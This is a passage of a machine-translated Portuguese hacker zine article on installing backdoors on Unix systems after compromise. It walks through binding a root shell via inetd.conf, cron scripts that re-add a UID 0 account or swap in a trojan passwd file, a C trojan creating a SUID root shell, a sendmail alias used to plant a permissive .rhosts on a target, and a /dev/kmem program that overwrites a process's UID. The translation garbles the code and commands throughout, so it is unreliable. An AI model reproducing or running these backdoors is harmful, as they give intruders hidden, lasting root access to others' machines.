Field (1) é o nome do servidor que deve aparecer no arquivo / etc / services. Isto diz-inetd que procurar no arquivo / etc / services para determinar qual a porta que deve associar o nome do programa com. (2) diz inetd qual o tipo de conexão de soquete o daemon irá esperar. TCP usa córregos, e utiliza datagramas UDP. Campo (3) é o campo de protocolo, que é um dos dois protocolos de transporte, o TCP ou UDP. Campo (4) especifica se ou não o daemon é iterativo ou simultâneas. A bandeira esperar 'indica que o servidor irá ligação de um processo e fazer todas as conexões subseqüentes esperar. "Nowait" significa que o servidor irá aceitar uma conexão, uma ova processo filho para tratar da ligação, e depois voltar a dormir, à espera de novas conexões. Campo (5) é o usuário (ou mais inportantly, o UID) que o servidor seja executado. (6) é o programa para ser executado quando uma conexão chega, e (7) é o real (comando e argumentos opcionais). Se o programa é trivial (geralmente não requer a interação do usuário) inetd pode manipulá-lo internamente. Isto é feito com uma "bandeira interna" nos campos (6) e (7). Assim, para instalar um backdoor acessível, escolher um serviço que não é usada frequentemente, e substituir o daemon que normalmente iriam lidar com ela com outra coisa. Um programa que cria um escudo SUID root, um programa que adiciona uma conta de root para você no arquivo / etc / passwd arquivos, etc .. Para a insinuação-danificada, tente o seguinte:
Abra o arquivo / etc / inetd.conf em um editor disponível. Encontre a linha que lê:

        
        
daytime stream tcp nowait root interno
e alterá-lo para:

        
daytime stream tcp nowait / bin / sh sh-i.
Agora você precisa reiniciar o / etc / inetd assim ele vai reler o arquivo de configuração. Cabe a você como você gostaria de fazer isso. Você pode matar e reiniciar o processo (kill -9, / usr / sbin / inetd ou / usr / etc / inetd) que interuppt conexões de rede ALL (por isso é uma boa idéia Para fazer isso fora as horas de pico).
[5] Uma opção para comprometer um serviço bem conhecido seria instalar um novo, que executa um programa de sua escolha. Um solução simples é criar um shell executa o backdoor semelhante ao anterior. Você precisa certificar-se da entrada aparece no / etc / serviços, bem como no arquivo / etc / inetd.conf. O formato do arquivo / etc / services é simples:
(1) (2) / (3) (4) smtp 25/tcp mail
Field (1) é o serviço de campo (2) é o número da porta, (3) é o tipo de protocolo do serviço de espera, e (4) é o nome comum associado ao serviço. Por exemplo, adicione esta linha ao arquivo / etc / serviços:

        
22/tcp mal mal
e esta linha ao arquivo / etc / inetd.conf:

        
stream tcp nowait mal / bin / sh sh-i
Reinicie o inetd como antes.
Nota: Potencialmente, estes são um backdoors muito poderoso. Eles não só oferecem Rentry local a partir de qualquer consideração sobre o sistema, eles oferecem Rentry de qualquer conta * * * em * qualquer computador na Internet.
[6] Cron-base de Tróia I Cron é uma ferramenta de administração maravilhoso sistema. É também uma ferramenta maravilhosa para backdoors, desde raiz crontab irá, assim, ser executado como root ... Novamente, dependendo do nível de experiência do administrador de sistemas (e da aplicação), esta backdoor pode ou não passado. / var / spool / cron / crontabs / raiz é onde a lista de raiz para crontabs geralmente está localizado. Aqui, você tem várias opções. Vou listar uma só alguns, como o cron-backdoors baseados são limitadas apenas pela sua imaginação. Cron é o daemon do relógio. É uma ferramenta para automaticamente executar comandos em datas e horários especificados. Crontab é o comando usado para adicionar, remover, ou ver as suas entradas crontab. É tão fácil de editar manualmente o arquivo / var / spool / crontab arquivo / root como é para usar o crontab. A crontab entrada possui seis campos:
(1) (2) (3) (4) (5) (6)
 
0 0 * * 1 / usr / bin / updatedb
Fields (1) - (5) são as seguintes: minutos (0-59), horas (0-23), dia do mês (1-31) meses do ano (1-12), dia da semana (0-6). Campo (6) é o comando (ou script) para executar. O shell script acima é executado nas segundas-feiras. Para explorar o cron, simplesmente adicionar uma entrada em / var / spool / crontab / root. Por exemplo: Você pode ter um cronjob que será executado por dia e olhar no arquivo / etc / passwd para a 0 UID conta que adicionou anteriormente, e adicionar-lhe se ele estiver ausente, ou não fazer nada em contrário (que não pode ser uma má idéia para realmente inserir * * este código em um shell script já está instalado crontab entrada, para continuar a ofuscar o seu intenções obscuros). Adicione esta linha ao / var / spool / crontab / root:

        
0 0 * * * / usr / bin / trojancode
Este é o shell script:
/ bin / csh # Será que nossa eviluser ainda sobre o sistema? Vamos ter certeza que ele é. daemon9@netcom.com #
conjunto evilflag = (eviluser `grep / etc / passwd`)

if ($ # evilflag == 0) then # Será que ele existe?
        
        
conjunto lineCount = `wc-l / etc / passwd`
        
CD # fazer isso em casa.
        
cp / etc / passwd. / temppass # Segurança em primeiro lugar.
        
@ LineCount [1] / = 2
        
@ LineCount [1] + = 1 # só queremos arquivos 2 temp
        
split - $ lineCount [1]. / temppass # string passwd opcional
        
echo "EvilUser:: 0:0: Mr. Sinister: / home / sweet / home: / bin / csh">>. / XAA
        
cat. / xab>>. / XAA
        
mv. / XAA / etc / passwd
        
chmod 644 / etc / passwd # ou seja lá o que foi previamente
        
rm. / xa *. / temppass
        
Feito eco ... diferente endif
[7] Cron-base de Tróia II. Este foi trazido à minha atenção por nosso próprio Mr. Zippy. Para isso, você precisa de uma cópia do / etc / passwd escondida em algum lugar. Neste arquivo oculto passwd (chamá-lo de / var / spool / mail / .sneaky) nós temos, mas uma entrada, uma raiz conta com um passwd de sua escolha. Corremos um cronjob que, todas as manhãs, às 2:30 horas (manhã ou qualquer outro), salvo uma cópia do arquivo real / etc / passwd, e instalar este um trojan que o arquivo real / etc / passwd de um minuto (sincronizar amostras!). Qualquer utilizador normal ou o processo de tentar fazer o login ou acessar o arquivo / etc / passwd seria um erro, mas um minuto depois, tudo seria ok. Adicione esta linha ao arquivo do root crontab:


        
29 2 * * * / usr / bin / sneakysneaky_passwd
tenha certeza que isto existe:
# echo "root: 1234567890123:0:0: Operador: /: / bin / csh"> / var / spool / mail / .sneaky
e este é o shell script simples:
/ bin / csh # Instalar o trojan / etc / passwd de um minuto daemon9@netcom.com #
cp / etc / passwd / etc / .temppass cp / var / spool / mail / .sneaky / etc / passwd sleep 60 mv / etc / .temppass / etc / passwd
[8] trojan código compilado. Idéia simples. Em vez de um shell script, tem algum código C agradável para ofuscar os efeitos. Aqui está. Certifique-se que ele é executado como root. Nome inócuos algo. Escondê-la bem.
/ * Um pouco de tróia para criar um shell de root SUID, se o argumento é bom dado. Código C, ao invés de escudo para ocultar óbvia é efeitos. * / / * Daemon9@netcom.com * /
# include
# define KEYWORD "Indústria3" # define BUFFERSIZE 10
int main (argc, argv) int argc; char * argv []; (

        
int i = 0;

        
if (argv [1]) (/ * temos um argumento, é a palavra-chave? * /

                
if (! strcmp ((palavra-chave, argv [1 ]))){
                        
                                
/ * Esta é a parte trojan. * /
                        
system ( "cp / bin / csh / bin/.swp121");
                        
system ( "chown root / bin/.swp121");
                        
system ( "chmod 4755 / bin/.swp121");
                
)
        
)
                                
/ * Coloque o seu sistema possivelmente trojan específico
                                   
mensagens aqui * /
                                
/ * Vamos ver como nós estamos fazendo alguma coisa ... * /
        
printf ( "bitmap Sychronizing registros de imagem.");
        
/ * System ( "ls-alR /> & / dev / null> / dev / null &"); * /
        
for (; i <10; i + +) (
                
fprintf (stderr ,".");
                
sono (1);
        
)
        
printf ( "nDone \. \ n");
        
return (0); ) / * End main * /
[9] O arquivo de aliases do sendmail. O arquivo de aliases do sendmail permite e-mail enviado para um usuário específico para expandir a vários utilizadores, ou talvez o tubo de saída para um programa. Mais conhecido deles é o trojan alias uudecode. Basta adicionar a linha:

 
"Decode:" | / usr / bin / uudecode "
ao arquivo / etc / aliases arquivo. Normalmente, você iria em seguida, criar uma uuencoded. Rhosts com o caminho completo embutido.
#! / bin / csh
# Create a nossa. Rhosts. Observação: este será a saída para stdout.
echo "+ +"> tmpfile / usr / bin tmpfile / uuencode / root / .rhosts
Telnet Próximo ao local desejado, porta 25. Basta FakeMail para decodificar e utilizar o corpo como tema, a versão do uuencoded . rhosts. Para um forro de um (não falsificou, no entanto) fazer isso:
% echo "+ +" | / usr / bin / uuencode / root / .rhosts | decode@target.com mail
Você pode ser tão criativo como você deseja, neste caso. Você pode configurar um alias que, quando enviado para, será executado um programa de sua escolha. Muitos dos scripts anteriores e métodos podem ser empregados aqui.


A Covert
[10] Trojan em programas de código comum. Este é um método bastante sorrateiras que é realmente apenas detectável por programas como o Tripwire. A idéia é simples: inserir código trojan na fonte de um programa comumente utilizados. Alguns dos programas mais úteis para nós neste caso são su, login e passwd porque já executado SUID root, e não necessitam de permissão de alteração. Abaixo estão algumas Exemplos geral do que você gostaria de fazer, depois de obter o código fonte correta para o sabor especial do UNIX você são Backdooring. (Nota: Esta pode não ser sempre possível, como alguns vendedores UNIX não são tão generosos com o seu código fonte.) Desde que o código é muito longa e diferente de muitos sabores, vou apenas incluir psuedo base-code:
obter a entrada; Se a entrada é bandeira especial codificado, spawn trojan mal; else if entrada é válida, continue; else parar com o erro; ...
Não é complexo ou difícil. Trojans desta natureza pode ser feito em menos de 10 linhas de código adicionais.


The Esoteric
[11] / dev / kmem explorar. Ele representa o virtual do sistema. Desde que o kernel mantém os seus parâmetros na memória, é possível para modificar a memória da máquina para alterar o UID de seus processos. Para fazer isso requer que / dev / kmem de leitura / gravação permissão. As seguintes etapas são executadas: Abra o dispositivo / dev / kmem, buscar a sua página na memória, substituirá o UID o processo atual, em seguida, gerar um csh, que vai herdar esse UID. O seguinte programa faz exatamente isso.
/ * Se / kmem é a leitura e gravação, esse programa vai mudar o usuário UID e GID de 0. * / / * Este código foi publicado originalmente no "segurança UNIX: Um tutorial prático" com algumas modificações por daemon9@netcom.com * /
# include # include # include # include # include # include # include
# define KEYWORD "nomenclature1"
struct Userpage usuário; longa endereço () userlocation,;
int main (argc, argv, envp) int argc; char * argv [], * envp []; (

        
count, FD;
        
tempo em que, lseek ();
        
        
if (argv [1]) (/ * temos um argumento, é a palavra-chave? * /
                
if (! strcmp ((palavra-chave, argv [1 ]))){
                        
fd = (open ( "/ dev / kmem", O_RDWR);

                        
if (fd <0) (
                                
printf ( "Não é possível ler ou escrever para / dev / kmem \ n");
                                
perror (argv);
                                
saída (10);
                        
)
                                
                        
Endereço userlocation = ();
                        
onde = (lseek (fd, userlocation, 0);
        
                        
if (onde! = userlocation) (
                                
printf ( "Não é possível procurar a página do usuário \ n");
                                
perror (argv);
                                
saída (20);
                        
)

                        
count = read (fd, & Userpage, sizeof (user));
        
                        
if (count! = sizeof (user)) (
                                
printf ( "Não é possível ler a página do usuário \ n");
                                
perror (argv);
                                
saída (30);
                        
)

                        
printf ( "Current UID:% d \ n", userpage.u_ruid);
                        
printf ( "Current GID:% d \ n", userpage.g_ruid);
                        
                        
userpage.u_ruid = 0;
                        
userpage.u_rgid = 0;
                        
                        
onde = lseek (fd, userlocation, 0);

                        
if (onde! = userlocation) (
                                
printf ( "Não é possível procurar a página do usuário \ n");
                                
perror (argv);
                                
saída (40);
                        
)
                        
                        
write (fd, & Userpage, ((char *) & (userpage.u_procp ))-(( char *) & Userpage));
                        
                        
execle ( "/ bin / csh", "/ bin / csh", "-i", (char *) 0, envp);
                
)
        
)
) / * End main * /
# include # include # include
# define LNULL ((LDFILE *) 0)
longa endereço () (
        
        
LDFILE objeto *;
        
Símbolo SYMENT;
        
idx tempo = 0;

        
ldopen objeto = ( "/ Unix", LNULL);

        
if (object!) (
                
fprintf (stderr, "Can't open / Unix. \ n");
                
saída (50);
        
)

        
for (; objeto ldtbread (, idx, e símbolo) == SUCCESS; idx + +) (
                
if (strcmp! ( "_u", objeto (ldgetname, símbolo &))) (
                        
fprintf (stdout, "página de usuário está em 0x% 8.8X \ n", symbol.n_value);
                        
objeto (ldclose);
                        
return (symbol.n_value);
                
)
        
)

        
tabela de símbolos fprintf (stderr, "Can't read in / Unix. \ n");
        
saída (60); )
[12] Desde que o código anterior requer / dev / kmem mundo para ser acessível, e isso não é provável que um evento natural, temos de tomar cuidado com isso. Meu conselho é escrever um script semelhante ao que em [7] que vai mudar as permissões em / dev / kmem para um discreta quantidade de tempo (digamos 5 minutos) e, em seguida, restaurar as permissões originais. Você pode adicionar essa fonte para a fonte em [7]:
chmod 666 / dev / kmem sleep 300 # soneca de 5 minutos chmod 600 / dev / kmem # Ou seja lá o que era antes


Da questão Concept Infinity II
Deixe seu Comentário:
Sem comentários »
Categorias: